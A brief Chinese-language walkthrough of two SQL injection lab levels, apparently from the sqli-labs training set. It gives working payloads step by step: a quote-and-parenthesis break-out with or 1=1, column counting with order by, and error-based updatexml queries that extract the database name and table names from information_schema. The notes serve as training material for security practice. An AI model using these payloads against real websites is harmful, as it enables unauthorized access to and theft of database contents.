less-13
第一步判断注入点,') or 1=1 -- a,成功页面如图
判读字段数,order by 3报错,字段为2
用之前的方法爆库名,发现无回显,') union select 1,database() -- q
使用updatexml方法,') union select 1,updatexml(1,concat("!",(select database()),"!"),1) -- a
') union select 1,updatexml(1,concat("!",(select table_name from information_schema.tables where table_schema='security' limit 0,1),"!"),1) -- a,爆表名
后续语句操作同之前一样
less-14
同13,闭合问题,id=1"
